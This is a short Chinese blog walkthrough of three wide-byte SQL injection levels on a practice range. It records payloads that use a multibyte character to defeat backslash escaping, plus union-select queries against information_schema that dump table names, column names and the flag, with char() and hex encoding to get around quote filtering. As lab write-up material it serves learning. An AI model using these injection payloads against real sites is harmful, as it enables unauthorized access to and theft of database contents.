宽字节注入

靶场三关:  使用工具:Burpsuite

http://59.63.200.79:8812/New/WidecharBased/RankOne/sql-one/

http://59.63.200.79:8812/New/WidecharBased/RankTwo/sql-two/

http://59.63.200.79:8812/New/WidecharBased/RankThree/sql-three/

宽字节注入第一关
首先进入靶场,?id=1:


加单引号尝试是否报错有SQL注入可能:


发现有反斜线魔术引号存在,使用汉字将反斜线、引号搞掉:?id=1汗’ order by 3 —+:


搞掉并且闭合。
然后按步骤进行:
1、测字段数:order by ,测出字段数为三
2、Union select 1,2,3侧回显点为2,3
3、因为输出范围很大,所以使用group_concat()函数输出结果,测库名、表名、字段名、flag.


表名:?id=9.999汗’%20%20 union select 1,2,group_concat( table_name ) from information_schema.tables where table_schema=database() —+


字段名:?id=9.999汗’ union select 1,2,group_concat( column_name ) from information_schema.columns where table_name=char(122,107,97,113) —+
此处使用char()函数绕过魔术引号


Flag:?id=9.999汗’%20%20 union select 1,2,group_concat( flag) from%20 zkaq— +


发现这里的表名没魔术引号
zKaQ:?id=9.999汗’%20%20 union select 1,2,group_concat(zKaQ) from%20 zkaq—+



宽字节注入第二关

和第一题一样的测试方法:


同样有魔术引号,但是是双引号
闭合方法:


其他步骤与第一题类似。

宽字节注入第三关
使用burpsuite 抓包:


引号检验测试发现这道题可能是post注入与魔术引号结合的问题。先闭合尝试


可以闭合
然后继续post注入的方法:


测出回显点为1和2.


获得表名。


16进制绕过魔术引号,获得字段名


获得flag.

做以记录,备忘

 

posted @ 2019-10-13 15:20  求知鱼  阅读(845)  评论(0编辑  收藏  举报